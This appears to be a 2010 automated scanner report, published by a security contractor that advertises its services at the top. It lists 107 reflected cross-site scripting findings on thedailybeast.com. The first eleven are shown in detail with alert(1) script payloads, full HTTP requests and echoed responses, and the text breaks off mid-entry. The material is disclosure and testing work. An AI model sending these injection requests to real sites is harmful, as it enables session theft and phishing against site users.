Contractor for Hire: Per Minute, Per Day, Bounty Hunting

Example #1: Automated Vulnerability Crawler: $1/min, max charge is US $10 for 200 URL + 10 Params for
CWE-79, CWE-89 and CWE-113 (XSS, SQL Injection and HTTP Header Injection).
Example #2: Hybrid Risk Analysis: $2/min, max charge is US $30 for 200 URL + 10 Params, Manual Testing of High Value URI/Param targets.
Example #3: Penetration Testing: Individual Case Basis, use Live Chat for a Quote.
Example #4:
Report generated by XSS.CX at Sat Nov 13 20:05:53 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

1. Cross-site scripting (reflected)

1.1. http://www.thedailybeast.com/beast-board/ [REST URL parameter 1]

1.2. http://www.thedailybeast.com/beast_files/btn_submit.gif [REST URL parameter 1]

1.3. http://www.thedailybeast.com/beast_files/btn_submit.gif [REST URL parameter 2]

1.4. http://www.thedailybeast.com/beltway-beast/too-hot-for-huff-post/ [REST URL parameter 1]

1.5. http://www.thedailybeast.com/big-fat-story/ [REST URL parameter 1]

1.6. http://www.thedailybeast.com/blogs-and-stories/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/ [REST URL parameter 1]

1.7. http://www.thedailybeast.com/blogs-and-stories/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/ [REST URL parameter 2]

1.8. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/ [REST URL parameter 1]

1.9. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/ [REST URL parameter 2]

1.10. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/ [REST URL parameter 1]

1.11. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/ [REST URL parameter 2]

1.12. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/ [REST URL parameter 1]

1.13. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/ [REST URL parameter 2]

1.14. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/ [REST URL parameter 1]

1.15. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/ [REST URL parameter 2]

1.16. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/ [REST URL parameter 1]

1.17. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/ [REST URL parameter 2]

1.18. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/november-13-the-week-in-viral-video/ [REST URL parameter 1]

1.19. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/november-13-the-week-in-viral-video/ [REST URL parameter 2]

1.20. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/the-lefts-deficit-outrage/ [REST URL parameter 1]

1.21. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/the-lefts-deficit-outrage/ [REST URL parameter 2]

1.22. http://www.thedailybeast.com/cheat-sheet/ [REST URL parameter 1]

1.23. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 1]

1.24. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 2]

1.25. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 3]

1.26. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 4]

1.27. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 1]

1.28. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 2]

1.29. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 3]

1.30. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 4]

1.31. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 1]

1.32. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 2]

1.33. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 3]

1.34. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 4]

1.35. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 1]

1.36. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 2]

1.37. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 3]

1.38. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 4]

1.39. http://www.thedailybeast.com/cheat-sheet/newsmaker/innovation/ [REST URL parameter 1]

1.40. http://www.thedailybeast.com/cheat-sheet/newsmaker/innovation/ [REST URL parameter 2]

1.41. http://www.thedailybeast.com/cheat-sheet/newsmaker/innovation/ [REST URL parameter 3]

1.42. http://www.thedailybeast.com/cheat-sheet/newsmaker/politics/ [REST URL parameter 1]

1.43. http://www.thedailybeast.com/cheat-sheet/newsmaker/politics/ [REST URL parameter 2]

1.44. http://www.thedailybeast.com/cheat-sheet/newsmaker/politics/ [REST URL parameter 3]

1.45. http://www.thedailybeast.com/cheat-sheet/newsmaker/sexybeast/ [REST URL parameter 1]

1.46. http://www.thedailybeast.com/cheat-sheet/newsmaker/sexybeast/ [REST URL parameter 2]

1.47. http://www.thedailybeast.com/cheat-sheet/newsmaker/sexybeast/ [REST URL parameter 3]

1.48. http://www.thedailybeast.com/favicon.ico [REST URL parameter 1]

1.49. http://www.thedailybeast.com/galleries/ [REST URL parameter 1]

1.50. http://www.thedailybeast.com/galleries/newsmaker/innovation/idea/ [REST URL parameter 1]

1.51. http://www.thedailybeast.com/galleries/newsmaker/innovation/idea/ [REST URL parameter 2]

1.52. http://www.thedailybeast.com/galleries/newsmaker/innovation/idea/ [REST URL parameter 4]

1.53. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/high-gloss/ [REST URL parameter 1]

1.54. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/high-gloss/ [REST URL parameter 2]

1.55. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/high-gloss/ [REST URL parameter 4]

1.56. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/picture-show/ [REST URL parameter 1]

1.57. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/picture-show/ [REST URL parameter 2]

1.58. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/picture-show/ [REST URL parameter 4]

1.59. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/red-carpet/ [REST URL parameter 1]

1.60. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/red-carpet/ [REST URL parameter 2]

1.61. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/red-carpet/ [REST URL parameter 4]

1.62. http://www.thedailybeast.com/newsmaker/art-and-photography/ [REST URL parameter 1]

1.63. http://www.thedailybeast.com/newsmaker/book-beast/ [REST URL parameter 1]

1.64. http://www.thedailybeast.com/newsmaker/giving-beast/ [REST URL parameter 1]

1.65. http://www.thedailybeast.com/newsmaker/hungry-beast/ [REST URL parameter 1]

1.66. http://www.thedailybeast.com/newsmaker/innovation/ [REST URL parameter 1]

1.67. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/ [REST URL parameter 1]

1.68. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/ [REST URL parameter 3]

1.69. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/joel-makower34534/ [REST URL parameter 1]

1.70. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/joel-makower34534/ [REST URL parameter 3]

1.71. http://www.thedailybeast.com/newsmaker/new-york-fashion-week/ [REST URL parameter 1]

1.72. http://www.thedailybeast.com/newsmaker/politics/ [REST URL parameter 1]

1.73. http://www.thedailybeast.com/newsmaker/sexybeast/ [REST URL parameter 1]

1.74. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/ [REST URL parameter 1]

1.75. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/ [REST URL parameter 3]

1.76. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/dita-von-teese346346/ [REST URL parameter 1]

1.77. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/dita-von-teese346346/ [REST URL parameter 3]

1.78. http://www.thedailybeast.com/partnersfeed/ [REST URL parameter 1]

1.79. http://www.thedailybeast.com/search/ [REST URL parameter 1]

1.80. http://www.thedailybeast.com/sexybeast/ [REST URL parameter 1]

1.81. http://www.thedailybeast.com/tag/50+cent/ [REST URL parameter 1]

1.82. http://www.thedailybeast.com/tag/america‚??s%20next%20top%20model/ [REST URL parameter 1]

1.83. http://www.thedailybeast.com/tag/america‚??s%20next%20top%20model/ [REST URL parameter 1]

1.84. http://www.thedailybeast.com/tag/antoine+dodson/ [REST URL parameter 1]

1.85. http://www.thedailybeast.com/tag/arnold+schwarzenegger/ [REST URL parameter 1]

1.86. http://www.thedailybeast.com/tag/chilean+miner+edison+pena/ [REST URL parameter 1]

1.87. http://www.thedailybeast.com/tag/christine%20o‚??donnell/ [REST URL parameter 1]

1.88. http://www.thedailybeast.com/tag/conan%20o‚??brien/ [REST URL parameter 1]

1.89. http://www.thedailybeast.com/tag/conan%20o‚??brien/ [REST URL parameter 1]

1.90. http://www.thedailybeast.com/tag/entertainment/ [REST URL parameter 1]

1.91. http://www.thedailybeast.com/tag/george+w+bush/ [REST URL parameter 1]

1.92. http://www.thedailybeast.com/tag/glee/ [REST URL parameter 1]

1.93. http://www.thedailybeast.com/tag/gossip+girl/ [REST URL parameter 1]

1.94. http://www.thedailybeast.com/tag/gwyneth+paltrow/ [REST URL parameter 1]

1.95. http://www.thedailybeast.com/tag/jim+carrey/ [REST URL parameter 1]

1.96. http://www.thedailybeast.com/tag/jimmy+mcmillan/ [REST URL parameter 1]

1.97. http://www.thedailybeast.com/tag/jon+hamm/ [REST URL parameter 1]

1.98. http://www.thedailybeast.com/tag/judah+friedlander/ [REST URL parameter 1]

1.99. http://www.thedailybeast.com/tag/keith+olbermann/ [REST URL parameter 1]

1.100. http://www.thedailybeast.com/tag/michelle+obama/ [REST URL parameter 1]

1.101. http://www.thedailybeast.com/tag/ok+go/ [REST URL parameter 1]

1.102. http://www.thedailybeast.com/tag/simpsons/ [REST URL parameter 1]

1.103. http://www.thedailybeast.com/tag/tina+fey/ [REST URL parameter 1]

1.104. http://www.thedailybeast.com/tag/twilight/ [REST URL parameter 1]

1.105. http://www.thedailybeast.com/tag/wheel+of+fortune/ [REST URL parameter 1]

1.106. http://www.thedailybeast.com/tag/zach+galifianakis/ [REST URL parameter 1]

1.107. http://www.thedailybeast.com/video/ [REST URL parameter 1]



1. Cross-site scripting (reflected)
There are 107 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.thedailybeast.com/beast-board/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /beast-board/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87ead"><script>alert(1)</script>c4b7bcd53c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beast-board87ead"><script>alert(1)</script>c4b7bcd53c3/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:57:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/beast-board87ead"><script>alert(1)</script>c4b7bcd53c3/"/>
...[SNIP]...

1.2. http://www.thedailybeast.com/beast_files/btn_submit.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /beast_files/btn_submit.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef99f"><script>alert(1)</script>957dd7e6ea2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beast_filesef99f"><script>alert(1)</script>957dd7e6ea2/btn_submit.gif HTTP/1.1
Accept: */*
Referer: http://www.thedailybeast.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.thedailybeast.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:26 GMT
Connection: close
Content-Length: 58605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/beast_filesef99f"><script>alert(1)</script>957dd7e6ea2/btn_submit.gif"/>
...[SNIP]...

1.3. http://www.thedailybeast.com/beast_files/btn_submit.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /beast_files/btn_submit.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acd23"><script>alert(1)</script>717e9f7ad6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beast_files/btn_submit.gifacd23"><script>alert(1)</script>717e9f7ad6f HTTP/1.1
Accept: */*
Referer: http://www.thedailybeast.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.thedailybeast.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:33 GMT
Connection: close
Content-Length: 58605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/beast_files/btn_submit.gifacd23"><script>alert(1)</script>717e9f7ad6f"/>
...[SNIP]...

1.4. http://www.thedailybeast.com/beltway-beast/too-hot-for-huff-post/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /beltway-beast/too-hot-for-huff-post/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29d3a"><script>alert(1)</script>e9205fb7368 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beltway-beast29d3a"><script>alert(1)</script>e9205fb7368/too-hot-for-huff-post/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 171923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/beltway-beast29d3a"><script>alert(1)</script>e9205fb7368/too-hot-for-huff-post/"/>
...[SNIP]...

1.5. http://www.thedailybeast.com/big-fat-story/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /big-fat-story/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd878"><script>alert(1)</script>17ff1b31cb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /big-fat-storydd878"><script>alert(1)</script>17ff1b31cb6/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:57:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/big-fat-storydd878"><script>alert(1)</script>17ff1b31cb6/"/>
...[SNIP]...

1.6. http://www.thedailybeast.com/blogs-and-stories/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52107"><script>alert(1)</script>1dc0689477b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories52107"><script>alert(1)</script>1dc0689477b/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:57:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories52107"><script>alert(1)</script>1dc0689477b/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/full/"/>
...[SNIP]...

1.7. http://www.thedailybeast.com/blogs-and-stories/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16a3d"><script>alert(1)</script>9ef41cfb5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-08-1616a3d"><script>alert(1)</script>9ef41cfb5b/unemployment-poll-should-the-government-do-more-about-jobs/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:57:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-08-1616a3d"><script>alert(1)</script>9ef41cfb5b/unemployment-poll-should-the-government-do-more-about-jobs/full/"/>
...[SNIP]...

1.8. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5382"><script>alert(1)</script>c6680173ae5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-storiesb5382"><script>alert(1)</script>c6680173ae5/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:56:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-storiesb5382"><script>alert(1)</script>c6680173ae5/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/full/"/>
...[SNIP]...

1.9. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aad00"><script>alert(1)</script>505e5016574 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-11-12aad00"><script>alert(1)</script>505e5016574/10-media-controversies-of-2010-juan-williams-to-cathie-black/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-11-12aad00"><script>alert(1)</script>505e5016574/10-media-controversies-of-2010-juan-williams-to-cathie-black/full/"/>
...[SNIP]...

1.10. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 886ba"><script>alert(1)</script>4ce8105120 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories886ba"><script>alert(1)</script>4ce8105120/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:57:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories886ba"><script>alert(1)</script>4ce8105120/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/full/"/>
...[SNIP]...

1.11. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/

Issue detail

